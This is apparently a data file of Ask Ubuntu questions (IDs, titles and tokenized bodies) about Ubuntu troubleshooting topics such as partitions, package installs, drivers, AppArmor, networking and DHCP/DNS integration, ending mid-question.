428245	why do disk utility and gparted show different information for the same hdd ( s ) ?	gparted and disks utility give me different sizes for my hard drive and its partitions . is there a reason , for both programs , to list different information or is it an error ? gparted & terminal output : sudo lsblk -o name , fstype , size , mountpoint , label dev/sda = 298.1 gib /dev/sda3 = 191.40 gib /dev/sda4 = 92 gib /dev/sda5 = 88.40 gib /dev/sda6 = 3.60 gib disks utility output dev/sdb = 320 gib /dev/sda3 = 206 gib /dev/sda4 = 99 gib /dev/sda5 = 95 gib /dev/sda6 = 3.9 gib
428246	problem in installing pip and lxml and importing xml for python	i tried following command apt-get install python-pip it gave message do you want to continue [ y/n ] ? y media change : please insert the disc labeled 'ubuntu 13.10 saucy salamander - release amd64 ( 20131016.1 ) ' in the drive '/media/cdrom/ ' and press enter what should i do now ? even i did after that apt-get install python-setuptools pls guide me that it can handle xml support to python and pip get install someone suggested that i should do once pip get install ... help ... . -sudo pip install requests==1.2.3 lxml==3.2.1
428261	how to put exceptions in ubuntu one synchronization	i am currently synchronizing a folder but inside it there is types of file i would like not to synchronize : like *.bak , *.tns ... how can i put exceptions the same way subversion does it ? is there a special config file i can change ? i did n't find it on my home folder . thank you for your help . [ edit ] the question is not to remove a `` # '' but to add a line like `` \a.aux\z '' ( not to sync *.aux ) which does n't work . any idea why ? maybe i did n't understand the syntax or it needs indentation ( like python does ) ... thanks for the help . [ \edit ]
428264	how to install subtitle edit 3.3 ?	i 'm a subtitle translator in sri lanka . so , i used subtitle edit ( http : //www.nikse.dk/subtitleedit ) in windows to create/edit/translate subtitles into sinhala language . but , is it possible to install it in ubuntu ? i have the latest version of ubuntu with all updates .
428271	how to access ubuntu files , while running from live cd	i write this code greeter-show-manual-login=true in my ubuntu etc/lightdm.conf , but when i restart my system ubuntu ca n't load it ! now i access this file with live cd , but when i open it and delete code , it does not permit me to save ! this picture shows the file lightdm.conf on my main ubuntu drive : and this is for lightdm.conf file , when i want to clean and save it ! please help me : (
428272	ubuntu13.10 freeze and restart randomly	my ubuntu 13.10 freezes randomly for 10 secs , then shuts down and restarts in any application running ( firefox , when using dash etc . )
428275	problem with samba4 post-instalation	i am a newbie linux enthusiastic . i recently installed samba4 on ubuntu 13.04 but experienced post installation error bobby @ bobby-aspire-4732z : ~ $ sudo apt-get install samba4 reading package lists ... done building dependency tree reading state information ... done samba4 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up samba4 ( 4.0.3+dfsg1-0.1ubuntu1 ) ... error ( < type 'exceptions.valueerror ' > ) : uncaught exception - unable to parse dn string file `` /usr/lib/python2.7/dist-packages/samba/netcmd/__init__.py '' , line 175 , in _run return self.run ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/samba/netcmd/dbcheck.py '' , line 108 , in run fix=fix , yes=yes , quiet=quiet , in_transaction=started_transaction ) file `` /usr/lib/python2.7/dist-packages/samba/dbchecker.py '' , line 58 , in __init__ self.infrastructure_dn = ldb.dn ( samdb , `` cn=infrastructure , '' + samdb.domain_dn ( ) ) dpkg : error processing samba4 ( -- configure ) : subprocess installed post-installation script returned error exit status 255 errors were encountered while processing : samba4 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) bobby @ bobby-aspire-4732z : ~ $ have anyone ever experienced this before and may i suggest your explanation . thank you before . regards , bobby
428276	codeblock c++ problem : procces returned 126 ( 0x7e )	i 'm having a problem with codeblocks . i ca n't run any c++ code and every time i try , i get the following error in terminal process returned 126 ( 0x7e ) ` i googled it and found this link : http : //www.thestudentroom.co.uk/showthread.php ? t=1737736 sudo nano /etc/fstab find the line which says ntfs somewhere on it . find the part of this line which says `` user '' - it 's under the header change `` user '' to `` user , exec '' - remove any `` noexec '' s ctrl-x and save when asked but when i followed the first steps , fstab did n't appear so i ca n't follow the next steps required to fix the problem . how can i fix this problem in a simplest way ? how should i open fstab that is required ? screenshots :
428280	why is my terminal invisible after minimizing it ubuntu 12.10	i am using 12.10 . i am able to get my terminal with [ super ] + [ w ] keys but not with alt + tab keys . why is it invisible after minimizing the terminal . how can i correct it ?
428281	no time in top panel ( gnome classic )	i 've been using ubuntu with gnome classic for a while and i 've noticed recently that in the `` indicator applet complete '' in the top panel , my name and the clock have disappeared . i think it happened a while ago when i was messing around with packages . every time i did apt-get ... it would say `` the following packages can be removed by apt-get autoremove '' , so i did it and then the clock and my name stopped appearing . can anyone help me ? thanks . it would be greatly appreciated .
428283	apparmor and ecrypfs trouble with encrypted ~/private directory	in my system i made an encrypted ~/private directory by ecryptfs-utils package . it works good , but i have a problem with apparmor . into the private folder i moved some home directories , like .local , .mozilla , .config , etc ... and obviously i link these to my home root . everything works , except some apparmor profile ( like telepathy ) because it does not recognize the new path as a valid path : the message is similar to this : [ 19753.442963 ] type=1400 audit ( 1393681049.447:322 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /home/-my-home-troot-/private/.config/dconf/user '' pid=23758 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 of course changing the single profile made apparmor recognize new folders , but i wanted to try a more general solution , so i tried to change /etc/apparmor.d/tunables/alias , but without results . my question : is it possible , to adapt all apparmor profiles in a general way , in order to adapt apparmor to new changes , introduced by moving some 'system ' folder into the encrypted ~/private directory ? many thanks in advance !
428284	what is a good alternative to the sux command ?	with the coming 14.04 release sux ( wrapper around su which will transfer your x credentials ) is no longer included in ubuntu . ( i think it is being removed because it is being pulled from debian , because of no maintenance of the original code . ) i 'm looking for simple alternatives , not something that requires you to mess around with config-files or run sshd locally .
428287	unable to login through lightdm	after executing the following script ( i removed all occurrences of tmp , mind you . or at least i thought i did ) and rebooting the system , i 'm no longer able to log in through the display manager . https : //github.com/chrisprobst/ubuntu-raring-haskell/blob/c5b6fcd2f56e010fe30c2bd08624e83bad8813bf/install.sh at the beginning , i could n't even use startx without issuing sudo . this was alleviated by `` chmod o+t , ugo+rw /tmp '' ( which leads me to believe i might have run the wrong ( the unmodified ) version of the script . anyways . after issuing the aforementioned chmod command and rebooting the system , i tried logging in again . while logging in from the terminal functions properly now , lightdm will log in , flash the screen twice and return to the login screen . is there anything else i could try ? i ran the script in it 's entirety ( minus installing the non dev libglw1-mesa )
428292	folder not visible on mounted drive	ok , so i finished up copying some stuff ( a lot actually ) from my portable drive to my laptop and it finished just as expected.then i needed to do some work on my windows installed on the same laptop so i unmounted the drives and it asked me to empty the trash in drive , so i did . when i booted with windows i noticed that the stuff i copied wasnt there in those drive.i thought something was wrong with the windows . so finished the work and booted back to ubuntu . and to my bad luck it didnt either showed any of the things that i copied to the drives.i checked the memory that the device was occupying and it was full ( since i copied a lot of stuff ) . so that means the files are still there just not accessible . i opened terminal and changed my current directory to the drive having my stuff and checked the list of folders in it and it says : can not access $ recycle.bin : input/output error can someone help me with those files .
428293	unable to create directory	can help me anyone here ? unable to create directory /srv/www/wp-uploads/localhost/2014/03 . is its parent directory writable by the server ?
428295	failed to install phablet-tools	i have done all these sudo apt-get update & & sudo apt-get upgrade sudo apt-get dist-upgrade sudo add-apt-repository ppa : phablet-team/tools sudo apt-get update sudo apt-get install phablet-tools android-tools-adb android-tools-fastboot its 12.04 lts i think ...
428299	nvidia settings not working after system update	my nvidia-settings application stopped working after i updated ubuntu 12.04 a while ago . when i do any changes in the application and hit `` apply '' , the application just exit and the changes are not carried out . an example of a change is disabling a secondary monitor . this is the log from one attempt : $ nvidia-settings error : error querying target relations gtk-message : ( for origin information , set gtk_debug ) : failed to retrieve property `gtkoptionmenu : :indicator-size ' of type `gtkrequisition ' from rc file value `` 0 '' of type `glong' gtk-message : ( for origin information , set gtk_debug ) : failed to retrieve property `gtkoptionmenu : :indicator-spacing ' of type `gtkborder ' from rc file value `` 0 '' of type `glong' the program 'nvidia-settings ' received an x window system error . this probably reflects a bug in the program . the error was 'badvalue ( integer parameter out of range for operation ) ' . ( details : serial 1106 error_code 2 request_code 139 minor_code 25 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) i use a lenovo w520 with nvidia-current . system is up to date , 304.116
428301	e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?	i try to update adobe flashplyer but i got this messsage : e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? what am i doing wrong ?
428305	not getting any logs written to auth.log , kern.log , syslog or any other log files	i am not getting any logs in auth.log , kern.log , syslog or any other log files on my 12.04 ubuntu server . there is also no rsyslog.conf if it should be there by default . how can i debug this & get the log files written normally as they should be ? edit : i just found that rsyslog was not installed at all by default on my ubuntu 12.04 . after installing it via apt-get i can see log files being written . but is it really like i need to manually install rsyslog to see the logs , otherwise i wo n't be getting anything in the logs ? ?
428306	can i load clonezilla not from usb but from my main internal hdd ?	i use clonezilla for backups . for that i write image to usb , loading from it and make image to my second pc . can i load clonezilla not from usb but from hdd of my laptop ?
428311	i can not change the iso file from which to create a startup disk	i have previously created a 13.10 usb startup disk , following the standard instructions to do so from ubuntu 12.4 lts . all went fine . that was a while ago . now iâm trying to create a 12.4.4 lts startup disk , following the same procedure . i opened the startup disk creator , and saw that it still had the 13.10 iso file selected ( even though that file no longer exists ) . i clicked on other , and selected the 12.4.4 lts iso file instead . it ignored me . it absolutely refuses to recognise that the iso file it has selected does not exist , and it refuses to allow me to select a new file . no matter how many times i select the 12.4.4 lts , i still see the 13.10 selected . what should i do ?
428312	access icloud photostream on ubuntu	my friend shared a photostream via icloud with me . unfortunately , i ca n't sign up to icloud because i do n't have any apple devices and the icloud control panel for windows does n't work on ubuntu . is there any work-around to access the photos at least via web browser ?
428317	ubuntu software center - error software ca n't be installed or removed	i have ubuntu running on an acer c720p , and i used crouton to install it alongside chromeos . i am using unity and running 13.10 . when i try to install software using the software center , it refuses to do so , saying in the first pop-up : software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.57 ' } ) : org.debian.apt.install-or-remove-packages then a second pop-up ( pop-under ? ) tells me : you are not allowed to perform this action . you do n't have the required privileges to perform this action . i know enough to run sudo software-center from a terminal , but this means working as root , as i understand things , and might entail dangers for me . the same thing happens when trying to update from unity 's graphical update tool . what to do ?
428321	what does `` gsettings get com.ubuntu.update-manager launch-time 1382579402 '' mean ?	when i run gsettings get com.ubuntu.update-manager launch-time the response is 1382579402 . what does the value of 1382579402 mean ?
428323	how to compile the source code of the operating system	how to compile the source code of the operating system , for example , ubuntu , just want to ask how to compile it into a form such that i can then alert it to boot and install , i want to try it and when i succeed i would like time to do your own distribution based on ubuntu customized my games that i will create . please advise me : ) thank you ! : )
428324	ca n't find lubuntu restricted access extras	hi i am very very new to this . ca n't find the extras which will allow me to play dvd and music etc . have found the code to manually input but have no idea how to do that . help please and please keep it simple , everything else works fine so far thanks
428326	what are `` opt-in flavors '' during development cycle ?	right now , 14.04 is in active development , the detailed release schedule of which is hosted here . one can see that the schedule says alpha 1 , alpha 2 and beta 1 are for opt-in flavors only . can someone please explain the concept of opt-in flavors ? what are they and what is different compared to flavors which have opted-out ? who decides upon them and how do i know which flavors have opted-in for a particular development cycle ? do the flavors which have opted-in change between the alphas and the betas ? and all the points which would help me understand why they are important and have a separate distinction .
428331	booting without full network configuration 13.10	recently i tried to install connman which removed network manager and some other dependencies . now i can not connect to any network , either wireless or broadband . i have tried multiple solutions from this forum but nothing seems to work . please help .
428336	extending win partition in win7 or shrinking ubuntu while in ubuntu ?	i have dual boot win7 and ubuntu 12.04 is shrinking linux partition with gparted somewhat less risky than extending windows partition in windows ? http : //postimg.org/image/5qdgafggt/ i would like to extend win7 c : volume from 40gb to maybe 50gb , which means shrinking ubuntu home partition f : volume from 102 to 92gb . is it better to do it in ubuntu ? dual boot is relatively fresh , i dont have so many data on the disk , but i 've installed many programs on windows . but extending ntfs c : partition is not the same as shrinking right ? there should n't be any problem in my opinion ? thank you .
428339	help , white-screen with youtube on chrome	i 'm using 64-bit ubuntu 12.04lts on my laptop a sony vaio e-series dual-booting it alongside windows 8.1 ... i use google chrome but my problem is that sometimes when i watch youtube videos when i go fullscreen and revert it back the whole screen becomes white , but i can still hear sounds , is there any way to solve this ?
428341	kubuntu : monitor disconnects and reconnects right after login	i have two monitors . after i typed my password in and the kubuntu animation starts my monitor disconnects and reconnects after like 1sec . what 's the problem ? how can i fix it ?
428342	get/emulate touch event in cordova app	i have a html5 app , wich i want to port to ubuntu as a cordova app with ubuntu sdk . it use touch events on a canvas and works fine in any browser , but no with cordova . i bind the events like this : canvas.addeventlistener ( `` touchstart '' , touchstart , false ) ; canvas.addeventlistener ( `` touchend '' , touchend , false ) ; but touchstart and touchend functions are never called . it still not work with canvas.ontouchstart = touchstart however ontouchstart in canvas returns true . is there any way to get/emulate the event with the sdk ? thank you !
428346	download failures	i am trying to download any graphics apt to my ubuntu 12.10 . i get e : unable to parse package file /var/lib/apt/lists/gb.archive.ubuntu.com_ubuntu_dists_saucy-updates_main_i18n_translation-en ( 1 ) e : the package lists or status file could not be parsed or opened . as an error . any ideas ?
428349	ubuntu 12.04 boots to blank screen without backlight after upgrade on asus a72j	i had a working version of ubuntu 12.04 in dual boot with windows 7 on my asus a72j . however , after installing the last ~350 upgrades ( i had not used ubuntu in a long time ) using the normal updating program of ubuntu , my laptop now boots to a blank screen without backlight . i think the issue might be with my video card ( ati 5470m 1gb ) drivers , but i have no idea how to solve it . do you have any idea what the problem might be ?
428350	remove package with apt-get or dpkg	i am just wondering if i want to remove a package from my system say google-chome-stable , i have two ways of doing it : sudo apt-get remove google-chrome-stable and dpkg -r google-chrome-stable just wondering if both are exactly same or there is some technicality ? and which one is the best practice ?
428351	external monitor wo n't appear in display settings	i installed xubuntu onto my hp 2133 notebook , installed all the updates and everything was working fine . i wanted to use an external monitor to extend the desktop between my laptop and monitor . the monitor displays a picture fine , it mirrors what is on the laptop but i ca n't change any settings for the monitor , such as the resolution . in display settings no other monitor is displayed , it just shows the 'default ' monitor which is the laptop and i can only change the resolution of that . i 've looked at several answers to this kind of problem but the answers are just about setting up multiple monitors when the computer detects the external one , but my problem is that my laptop wo n't even show settings for the external monitor , like it 's not there .
428352	backing up 2 computers	i have 2 laptops that i would like to have the same videos , pictures , and documents on . both run ubuntu , both have a media partition with mostly the same videos and stuff on them . ubuntu one has only 5gb so i ca n't use that . there is like 50gb+ of stuff on the media partitions . i have an external drive 500gb i 'd like to use that . should i clown the drives with the videos ? then install the same backup services on them ? then have my 500gb external drive back up both with the same info ? does any of this make any sense ? thank you : d
428355	how to open . srt files in ubuntu	my problem is that i ca n't open .srt files . this file is in an .rar archive along with a .txt file . when i extract , only the .txt file gets extracted . i downloaded several programs that are supposed to support this file format like gnome subtitles , but none of them works properly . i keep getting the following error , even when i specify open with :
428360	how do i correct for this message : `` pixel rate is over limitation '' ?	at boot , the text is not appearing correctly . i know the bottom line is boot to xp but i ca n't read it . i know the top line is ubuntu and i ca n't see that either . i get the message about the pixel rate being over limitation , but i do n't know how to fix it . once into ubuntu , the screen looks lovely . it does not feel right to just ignore the warning . any ideas ? it has to do with a pixel clock rate limit .
428361	why does n't ssh record failed access in /var/log/btmp ?	i want to record ssh failed accesses . i know that i can use /var/log/auth.log but i rather want to use the command lastb . but when i execute lastb , it does n't show any records from ssh failed access . is there a solution this problem ?
428371	missing 'browse ' button in rhythmbox menu	rhythmbox is missing the browsebutton , in the top menu , as you can see in the screen shot below : where is the image file located and how can i fix this ?
428372	gedit plugins error	i can 't run some plugin in gedit . when i run some plugin like `` externaltools `` program is closed and show this error in the terminal : > > ( gedit:11796 ) : gvfs-remotevolumemonitor-warning ** : invoking issupported ( ) failed for remote volume monitor with dbus name > org.gtk.private.gduvolumemonitor : > org.freedesktop.dbus.error.spawn.childsignaled : process > /usr/lib/gvfs/gvfs-gdu-volume-monitor received signal 6 traceback > ( most recent call last ) : file `` /usr/local/lib/python2.7/site.py '' , > line 548 , in < module > > main ( ) file `` /usr/local/lib/python2.7/site.py '' , line 530 , in main > known_paths = addusersitepackages ( known_paths ) file `` /usr/local/lib/python2.7/site.py '' , line 266 , in addusersitepackages > user_site = getusersitepackages ( ) file `` /usr/local/lib/python2.7/site.py '' , line 241 , in getusersitepackages > user_base = getuserbase ( ) # this will also set user_base file `` /usr/local/lib/python2.7/site.py '' , line 231 , in getuserbase > user_base = get_config_var ( 'userbase ' ) file `` /usr/local/lib/python2.7/sysconfig.py '' , line 516 , in get_config_var > return get_config_vars ( ) .get ( name ) file `` /usr/local/lib/python2.7/sysconfig.py '' , line 449 , in get_config_vars > import re file `` /usr/local/lib/python2.7/re.py '' , line 105 , in < module > > import sre_compile file `` /usr/local/lib/python2.7/sre_compile.py '' , line 14 , in < module > > import sre_parse file `` /usr/local/lib/python2.7/sre_parse.py '' , line 17 , in < module > > from sre_constants import * file `` /usr/local/lib/python2.7/sre_constants.py '' , line 18 , in < module > > from _sre import maxrepeat importerror : can not import name maxrepeat and question 2 : what is the best gedit plugins for programing ? sorry all for my english : - )
428376	what options do you recommend for running an emulation of the windows 7 operating system on the ubuntu os ?	i realize there are several available but am unsure which are capable of running the win7 os in a virtual machine . you 're opinions are greatly appreciated .
428377	terminology wo n't open	i have installed terminology terminal but when clicked , it wo n't open . running ubuntu 13.10 . i also installed enlightenment desktop environment but it wo n't open there either .
428378	internet connection problems resolving host	first time user of ubuntu . running for 6 days no problem . running vers . 13.10 . try connecting to the internet , being told pages not available . wifi access and other connected devices ( this android tablet for example ) are fine . uninstalled clamav , just in case , checked ufw firewall ( disabled ) and tried pinging a few ip addresses without any joy . subsequently , logged on the ubuntu laptop using the guest account , fired up firefox and connected and was able to surf happily ... .for about 5 mins then same thing.now unable to connect using either my account ( with chrome ) or the guest account with firefox . all other household devices using the same internet connection are all fine . confused . any advice appreciated , worried now that i may not be able to work tomorrow : - (
428380	regarding installing of ubuntu for phone on my note 2 ( gt-n7100 )	i 'm currently using galaxy note ii ( gt-n7100 ) running on android 4.3..and is it possible to install ubuntu for phone in my note 2..my device is not rooted..if yes please provide the step by step instructions ... thanks in advance .
428382	error while installing catalyst 13.12 on ubuntu 13.10 32 bit	i have downloaded catalyst drivers from amd site , unpacked it and created a package with $ sudo ./amd-catalyst-13.12-linux-x86.x86_64.run -- buildpkg ubuntu/saucy created directory fglrx-install.flgutu verifying archive integrity ... all good . uncompressing amd catalyst ( tm ) proprietary driver-13.251 ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. ===================================================================== amd catalyst ( tm ) proprietary driver installer/packager ===================================================================== generating package : ubuntu/saucy 1package /home/xxx/downloads/drivers_13.251/fglrx_13.251-0ubuntu1_i386.deb has been successfully generated package /home/xxx/downloads/drivers_13.251/fglrx-dev_13.251-0ubuntu1_i386.deb has been successfully generated package /home/xxx/downloads/drivers_13.251/fglrx-amdcccle_13.251-0ubuntu1_i386.deb has been successfully generated removing temporary directory : fglrx-install.flgutu after that i try to install those packages but i get : $ sudo dpkg -i fglrx_13.251-0ubuntu1_i386.deb fglrx-amdcccle_13.251-0ubuntu1_i386.deb fglrx-dev_13.251-0ubuntu1_i386.deb selecting previously unselected package fglrx . ( reading database ... 171591 files and directories currently installed . ) unpacking fglrx ( from fglrx_13.251-0ubuntu1_i386.deb ) ... selecting previously unselected package fglrx-amdcccle . unpacking fglrx-amdcccle ( from fglrx-amdcccle_13.251-0ubuntu1_i386.deb ) ... selecting previously unselected package fglrx-dev . unpacking fglrx-dev ( from fglrx-dev_13.251-0ubuntu1_i386.deb ) ... setting up fglrx ( 2:13.251-0ubuntu1 ) ... update-alternatives : using /usr/lib/fglrx/ld.so.conf to provide /etc/ld.so.conf.d/i386-linux-gnu_gl.conf ( i386-linux-gnu_gl_conf ) in auto mode update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist update-alternatives : warning : forcing reinstallation of alternative /usr/lib/fglrx/ld.so.conf because link group i386-linux-gnu_gl_conf is broken update-alternatives : warning : skip creation of /usr/lib32/libaticalcl.so because associated file /usr/lib32/fglrx/libaticalcl.so ( of link group i386-linux-gnu_gl_conf ) does n't exist update-alternatives : warning : skip creation of /usr/lib32/libaticalrt.so because associated file /usr/lib32/fglrx/libaticalrt.so ( of link group i386-linux-gnu_gl_conf ) does n't exist update-alternatives : using /usr/lib/fglrx/alt_ld.so.conf to provide /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ( x86_64-linux-gnu_gl_conf ) in auto mode update-initramfs : deferring update ( trigger activated ) loading new fglrx-13.251 dkms files ... first installation : checking all kernels ... building only for 3.11.0-17-generic building for architecture i686 building initial module for 3.11.0-17-generic error ! bad return status for module build on kernel : 3.11.0-17-generic ( i686 ) consult /var/lib/dkms/fglrx/13.251/build/make.log for more information . update-initramfs : deferring update ( trigger activated ) processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... setting up fglrx-amdcccle ( 2:13.251-0ubuntu1 ) ... setting up fglrx-dev ( 2:13.251-0ubuntu1 ) ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.11.0-17-generic processing triggers for libc-bin ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - in the log $ cat /var/lib/dkms/fglrx/13.251/build/make.log dkms make.log for fglrx-13.251 for kernel 3.11.0-17-generic ( i686 ) nie , 2 mar 2014 , 15:10:53 cet amd kernel module generator version 2.1 doing makefile based build for kernel 2.6.x and higher rm -rf *.c *.h *.o *.ko *.a . ? ? * *.symvers make -c /lib/modules/3.11.0-17-generic/build subdirs=/var/lib/dkms/fglrx/13.251/build/2.6.x modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-17-generic' cc [ m ] /var/lib/dkms/fglrx/13.251/build/2.6.x/firegl_public.o cc [ m ] /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.o /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.c : in function ‘kcl_acpi_parsetable’ : /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.c:999:5 : warning : passing argument 1 of ‘ ( acpi_status ( * ) ( u32 , void * , void * ) ) handler’ makes integer from pointer without a cast [ enabled by default ] ( ( acpi_table_handler ) handler ) ( hdr ) ; ^ /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.c:999:5 : note : expected ‘u32’ but argument is of type ‘struct acpi_table_header *’ /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.c:999:5 : error : too few arguments to function ‘ ( acpi_status ( * ) ( u32 , void * , void * ) ) handler’ make [ 2 ] : *** [ /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/fglrx/13.251/build/2.6.x ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-17-generic' make : *** [ kmod_build ] error 2 build failed with return value 2 where the error is : /var/lib/dkms/fglrx/13.251/build/2.6.x/kcl_acpi.c:999:5 : error : too few arguments to function ‘ ( acpi_status ( * ) ( u32 , void * , void * ) ) handler’
428385	ca n't boot to windows after ubuntu install	i 've installed ubuntu , but now i ca n't boot to windows . here is my boot repair output . how can i solve this problem ?
428387	my ubuntu randomly automatically logout after installing openbox	i got this error on my log , it keep logout automatically already reinstalled openbox , but this still happen btw i 'm running ubuntu 12.04 error : apport ( pid 26391 ) sun mar 2 20:57:36 2014 : gdbus call error : error : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files error : apport ( pid 26391 ) sun mar 2 20:57:36 2014 : debug : session gdbus call : error : apport ( pid 26391 ) sun mar 2 20:57:36 2014 : this executable already crashed 2 times , ignoring error : apport ( pid 28921 ) sun mar 2 20:59:46 2014 : called for pid 26598 , signal 6 error : apport ( pid 28921 ) sun mar 2 20:59:46 2014 : executable : /usr/bin/openbox ( command line `` /usr/bin/openbox -- startup /usr/lib/openbox/openbox-autostart\ openbox '' ) error : apport ( pid 28921 ) sun mar 2 20:59:46 2014 : gdbus call error : error : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files error : apport ( pid 28921 ) sun mar 2 20:59:46 2014 : debug : session gdbus call : error : apport ( pid 28921 ) sun mar 2 20:59:46 2014 : this executable already crashed 2 times , ignoring fixed by removing apport update-manager and update-manager-core
428392	how to turn off antialiasing	i am using ubuntu 13.10 gnome desktop , it seems to me that there 's something like screen antialiasing . normally it does n't matter but one graphics program that i run through wine , it have wrong text and workplanes . the exactly same program on windows is beautifully sharp . how to turn it off ? i ca n't yet post images .
428396	retrieve data on hard drive	so my computer crashed and as of now i am currently running ubuntu 12.04 on a usb . i 'm using the try option because for some reason it wo n't let me do a full install . i researched and realized that may have to erase my entire hard drive before i can do a reinstall . if this is the case i would like to know if there is anyway i can retrieve the data i had store on my partition . under the try option i do n't have permission to access my own files and am unsure if i can recover them if i do a hard reset . if anyone has any helpful suggestions i would appreciate it . i tried all the helpful suggestions and none of them worked so instead i just re-installed 12.04 back on my hard-drive . i was able to recover videos i had stored but none of the documents that i had saved . thanks for the help .
428399	wireless driver ( relink rt3290 ) not working	i 'm having hp probook 450 and ubuntu 13.10 with 3.11 kernel . laptop was new , it came with suse enterprise edition but as it was not possible to be translated to my local language i installed ubuntu . according to ununtu site - relink rt3290 is certified to work with the system and this machine but for some reason - there is a lot of issue and i can not fix it . issue : wireless driver ( relink rt3290 ) not working correctly symptoms : system do not recognize the driver automatically until this is done ( how do i get a ralink rt3290 wireless card working ? ) . extra guide as well when shutting down - the system restart itself one the system boot up - there is connection but when internet site is open ( or skype turned on ) - linux shows kernel panic error what i have tried : i had ubuntu 12.04 - tried all suggestions from the forums - but it was not working , still the above symptoms . upgraded to 12.10 with the below suggestions - still issues appear upgraded to 13.10 with the below suggestions - still issues appear when i turn off wireless - no shutdown issue nor connection issue ( via cable ) i have added turning down wireless command to ~/.bash_logout script - not working ( http : //unix.stackexchange.com/questions/77419/how-to-disable-wlan0-when-shutdown ) from here http : //ubuntuforums.org/showthread.php ? t=1134201 & page=3 killwlan command - not working for some reason rfkill command not working for some reason shutdown from terminal when wireless is on is still restarting the system ( http : //forums.linuxmint.com/viewtopic.php ? f=49 & t=118094 & sid=6872e90dc26f71758a19f626d8038568 & start=20 ) this ( ubuntu 12.10 wireless shutdown issue ) was not working as well , there is no killwlan file in /etc/init.d let me know if i need to provide you more info on this . please help . thanks .
428400	how to install openjdk	when i try sudo apt-get install openjdk-7-jdk i got a message telling me that the package could not be found in database . i guess i 'm missing repositories . here 's the content of sources.list file : deb http : //fr.archive.ubuntu.com/ubuntu/ saucy restricted universe multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ saucy-updates restricted universe multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ saucy-security restricted universe multiverse deb http : //archive.canonical.com/ubuntu saucy partner deb http : //extras.ubuntu.com/ubuntu saucy main deb http : //fr.archive.ubuntu.com/ubuntu/ saucy-proposed restricted universe multiverse deb http : //fr.archive.ubuntu.com/ubuntu/ saucy-backports restricted universe multiverse which is the repository to install openjdk 7 . thanks when i do sudo apt-get install -f apt-cache policy openjdk-7-jdk i got this : 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded openjdk-7-jdk : installé : ( aucun ) candidat : 7u51-2.4.4-0ubuntu0.13.10.1 table de version : 7u51-2.4.4-0ubuntu0.13.10.1 0 500 http : //archive.ubuntu.com/ubuntu/ saucy-updates/main amd64 packages 500 http : //archive.ubuntu.com/ubuntu/ saucy-security/main amd64 packages 7u25-2.3.12-4ubuntu3 0 500 http : //archive.ubuntu.com/ubuntu/ saucy/main amd64 packages
428401	using ubuntu 12.04 dhcp server to securely update dns records in active directory	what seems , to me , to be a simple question , apparently is n't . i have a linux ( ubuntu 12.04 ) dhcp server : isc-dhcp-server , that works great . no issues and all clients can get an address with no issues . i also have a windows 2003 server active directory domain : corp.local , e.g . that works great as well . what i 'm trying to do , is to get the linux dhcp server to securely update the dns records in active directory . i can get full functionality if i select `` secure and non secure '' updates in windows dns , but nothing works when i select secure only . i 've tried and tried and tried , all to no avail . i recognize that i need to somehow share a key or encrypt the data between the linux dhcp clients and windows ad/dns , but i just cant find a how-to . any suggestions ? i am not interested in having both dhcp and dns in linux or both dhcp and dns in windows . i want to keep the linux dhcp server and windows ad/dns . i just want to find a way to let the linux dhcp clients securely update their own records in windows ad . when i have `` secure and non secure '' enabled in windows dns , it works - i get the linux dhcp records in ad . i also get a `` txt '' record that looks like a hash for some kind of secure update . it 's a strong preference ( just short of a requirement ) to have the 